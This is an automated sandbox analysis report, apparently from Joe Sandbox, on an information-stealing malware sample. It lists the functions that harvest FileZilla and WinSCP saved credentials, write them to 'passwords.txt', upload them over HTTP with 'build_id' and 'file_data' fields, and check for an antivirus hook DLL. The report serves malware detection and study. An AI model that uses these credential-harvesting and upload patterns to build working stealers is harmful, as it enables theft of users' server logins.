                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4D017B6614304BBD7409BA6DC0DF9A7AACEBC4726F000055BA46D2290DAB09948D720
                                                                                                                                                                                                              Function 00930F8F Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                              • Opcode ID: 250ffbba47f33592c54f24f028e23611c575b4e90160998f8262d4947aeae74c
                                                                                                                                                                                                              • Instruction ID: b1c7261addb302cdd93470fd468c067b5b28b5faa8003981e1fa5fb4747a0257
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 250ffbba47f33592c54f24f028e23611c575b4e90160998f8262d4947aeae74c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BE06DB091020C9BCB11DFA0EC5AA9D77BCAB08208F4004A59509A7180DA70AB998F84
                                                                                                                                                                                                              Function 009214AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00921503,avghookx.dll,009386D0), ref: 009214DF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1586166983-0
                                                                                                                                                                                                              • Opcode ID: 53cd46c0f5225b1632034609947a9a91883325c69f3fda0b0b0e941f7eca8bb8
                                                                                                                                                                                                              • Instruction ID: 5d3d94f72a9f0a1c91cbeb422a4c67a0e075976d202120bb30198796f3163a58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53cd46c0f5225b1632034609947a9a91883325c69f3fda0b0b0e941f7eca8bb8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0F08232A04160EBCF20DF59E804AAAF7B8EB53761F256454E809B3210C334ED20EA98
                                                                                                                                                                                                              Function 00925482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 29 925482-925593 call 9304bc call 9304ee call 924ab6 call 931e32 lstrlenA call 931e32 call 9304bc * 4 StrCmpCA 48 925595 29->48 49 92559b-9255a1 29->49 48->49 50 9255a3-9255b8 InternetOpenA 49->50 51 9255be-9256ce call 931c1f call 93059c call 930562 call 922920 * 2 call 9305de call 93059c call 9305de call 930562 call 922920 * 3 call 9305de call 93059c call 930562 call 922920 * 2 InternetConnectA 49->51 50->51 52 925e64-925eec call 922920 * 4 call 9304ee call 922920 * 3 50->52 51->52 118 9256d4-925712 HttpOpenRequestA 51->118 86 925eee-925f2e call 922920 * 6 call 93d1a8 52->86 119 925e58-925e5e InternetCloseHandle 118->119 120 925718-92571e 118->120 119->52 121 925720-925736 InternetSetOptionA 120->121 122 92573c-925d77 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 9471e0 lstrlenA call 9471e0 lstrlenA * 2 call 9471e0 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 925db5-925dc5 call 931ad2 122->309 310 925d79-925db0 call 9304bc call 922920 * 3 122->310 315 925dcb-925dd0 309->315 316 925f2f 309->316 310->86 318 925e11-925e2e InternetReadFile 315->318 320 925dd2-925dda 318->320 321 925e30-925e43 StrCmpCA 318->321 320->321 323 925ddc-925e0c call 9305de call 930562 call 922920 320->323 324 925e45-925e46 ExitProcess 321->324 325 925e4c-925e52 InternetCloseHandle 321->325 323->318 325->119
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925519
                                                                                                                                                                                                                • Part of subcall function 00931E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00B7E708,?,?,?,009328E1,?,?,00000000), ref: 00931E52
                                                                                                                                                                                                                • Part of subcall function 00931E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,009328E1,?,?,00000000), ref: 00931E5F
                                                                                                                                                                                                                • Part of subcall function 00931E32: HeapAlloc.KERNEL32(00000000,?,?,?,009328E1,?,?,00000000), ref: 00931E66
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956976,0095695B,00956957,0095694B), ref: 00925588
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009255AA
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009256C0
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00925704
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00925736
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,",file_data,00957848,------,0095783C,?,",00957830,------,00957824,65158feadb3cebfa5c9a9e36f0d461fe,",build_id,0095780C,------), ref: 00925C67
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925C7A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00925C92
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00925C99
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925CA6
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00925CB4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?), ref: 00925CC9
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00925CD6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00925CE4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00925CF2
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 00925D05
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00925D1A
                                                                                                                                                                                                              • HttpSendRequestA.WININET(?,?,00000000), ref: 00925D2D
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00925D6F
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 00925E26
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,block), ref: 00925E3B
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00925E46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                              • String ID: ------$"$"$"$"$--$------$------$------$------$65158feadb3cebfa5c9a9e36f0d461fe$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                              • API String ID: 2638065154-1314835941
                                                                                                                                                                                                              • Opcode ID: a6b158bfba534bcf2f08ce89567d186bd4df42a8289ccb8513ce97ad148f55cf
                                                                                                                                                                                                              • Instruction ID: 9a7e40c96927221fa7b20852572899b15aa6c46d28777043d0c71d7950e6012a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6b158bfba534bcf2f08ce89567d186bd4df42a8289ccb8513ce97ad148f55cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47428F319111699BDF21EB21EC42B9DB7B8BF84344F0585E1B589B3126DE70AFC69F80
                                                                                                                                                                                                              Function 0092E6A4 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289stringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0092E753
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,009568FF,009568FE,009568EF,009568EE), ref: 0092E799
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092E7A0
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0092E7B4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E7BF
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0092E7F3
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E7FE
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0092E82C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E837
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0092E865
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092E870
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092E8D6
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092E8EA
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0092EC91), ref: 0092EA12
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                              • API String ID: 4146028692-935134978
                                                                                                                                                                                                              • Opcode ID: 44aa97440ce366ce015cdf41b441a4c0ae6f65368e4f440ed173662a5d39f3fc
                                                                                                                                                                                                              • Instruction ID: a563cc2a686103627db826d2d9de37cefd319b5fac35f7be8cc2d29e1b87aaf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44aa97440ce366ce015cdf41b441a4c0ae6f65368e4f440ed173662a5d39f3fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8A13232940219ABCF01FBA1FD4AA8DBB78AF88705F514060F605B7066DF74AE498F95
                                                                                                                                                                                                              Function 0092E15B Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E18C
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E1AC
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E1BD
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092E1CE
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E202
                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0092E233
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E24B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E272
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092E292
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0092E2B5
                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,009568D7), ref: 0092E34E
                                                                                                                                                                                                              • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0092E3AE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                              • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                              • API String ID: 463713726-2798830873
                                                                                                                                                                                                              • Opcode ID: 3c0bdae48d611482009e5f63a2629ad17907d80a5ee9c91e06c351a25b80431a
                                                                                                                                                                                                              • Instruction ID: 36fd8d505a09d26f43026998a8d4bd2f62cb01db4e7a766a136468111cf570fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c0bdae48d611482009e5f63a2629ad17907d80a5ee9c91e06c351a25b80431a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6D1D57192012DABDB21EBA1EC91BD9B778AF84704F0054E7B909B3055DA70BF89CF61
                                                                                                                                                                                                              Function 00925F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 568 925f39-925ffe call 9304ee call 924ab6 call 9304bc * 5 InternetOpenA StrCmpCA 583 926000 568->583 584 926006-92600c 568->584 583->584 585 926012-92619c call 931c1f call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 93059c call 930562 call 922920 * 2 InternetConnectA 584->585 586 9266ff-926727 InternetCloseHandle call 928048 584->586 585->586 662 9261a2-9261dc HttpOpenRequestA 585->662 592 926766-9267ec call 922920 * 4 call 921cde call 922920 call 93d1a8 586->592 593 926729-926761 call 93051e call 9305de call 930562 call 922920 586->593 593->592 663 9261e2-9261e8 662->663 664 9266f3-9266f9 InternetCloseHandle 662->664 665 926206-926690 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 9471e0 lstrlenA * 2 call 9471e0 lstrlenA HttpSendRequestA 663->665 666 9261ea-926200 InternetSetOptionA 663->666 664->586 809 9266d2-9266ea InternetReadFile 665->809 666->665 810 926692-92669a 809->810 811 9266ec-9266ed InternetCloseHandle 809->811 810->811 812 92669c-9266cd call 9305de call 930562 call 922920 810->812 811->664 812->809
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00925FD8
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00925FF6
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0092618E
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 009261D2
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,",mode,009578D0,------,009578C4,65158feadb3cebfa5c9a9e36f0d461fe,",build_id,009578AC,------,009578A0,",00957894,------), ref: 009265FD
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092660C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00926617
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092661E
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092662B
